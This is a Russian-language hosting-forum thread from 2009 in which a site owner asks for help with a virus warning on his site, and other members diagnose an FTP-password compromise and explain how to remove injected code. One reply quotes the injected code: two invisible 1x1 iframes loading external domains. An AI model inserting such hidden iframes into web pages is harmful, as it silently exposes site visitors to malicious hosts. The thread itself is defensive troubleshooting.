Оффтоп: вирус на сайте :(

Тема в разделе "Хостинг", создана пользователем borz002, 30 авг 2009.

Статус темы:
Закрыта.
Модераторы: Aste, stooper
  1. borz002

    borz002 Писатель

    Регистр.:
    3 июн 2008
    Сообщения:
    2
    Симпатии:
    0
    Всем привет, первый пост.

    Недавно делал обновление на сайте, после чего люди начали жаловаться что на сайте вирус и прога блокирует сайт :(

    Слил все файлы с хоста, проверил вебом cureit, но ничего не найдено. Заказчик уже нервничает, не могу найти выход.

    Адрес http://hotel-blacksea.ru . Помогите, пожалуйста =(
     
  2. seoboy

    seoboy

    Регистр.:
    17 мар 2007
    Сообщения:
    165
    Симпатии:
    27
    1 Сайт не доступен
    2. В сохраненной копии яндекса нашел видимо чужой код
    iframe src="http://bukirda.com/?click=266681" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://beidzan.com/?click=23065E" width=1 height=1 style="visibility:hidden;position:absolute"></iframe
     
  3. Dozor2

    Dozor2

    Регистр.:
    18 дек 2007
    Сообщения:
    328
    Симпатии:
    155
    В тотал коммандере (к примеру) сделай поиск по файлам с наличием в тексте iframe. Затем открывай файлы и удаляй код ифрейма. Скорей всего слили пароль от фтп и закинули вирус. Не храни пароли в фтп клиенте.
     
  4. seoboy

    seoboy

    Регистр.:
    17 мар 2007
    Сообщения:
    165
    Симпатии:
    27
    опять же не факт,что кроме iframe не напихали закодированного кода. надо внимательно просматривать полностью код
     
  5. borz002

    borz002 Писатель

    Регистр.:
    3 июн 2008
    Сообщения:
    2
    Симпатии:
    0
    Спасибо! Щас буду искать.
     
  6. lex2d

    lex2d

    Регистр.:
    12 май 2008
    Сообщения:
    613
    Симпатии:
    104
  7. vergeles

    vergeles Постоялец

    Регистр.:
    20 апр 2009
    Сообщения:
    67
    Симпатии:
    1
    Судя по тому что сайт так и не работает то вирусов поубивать не удалось.
    Насколько я знаю и понимаю у тебя или у того в кого есть доступ на ftp украли пароль а потом туда загрузили вируса который и добавляет ifram. Ты удаляеш iframe а он потом опять появится.
    Надо удалять сам скрипт который эти ссылки и добавляет.
    Но это так как я понимаю так что не пинайте больно если не прав.:)
     
Статус темы:
Закрыта.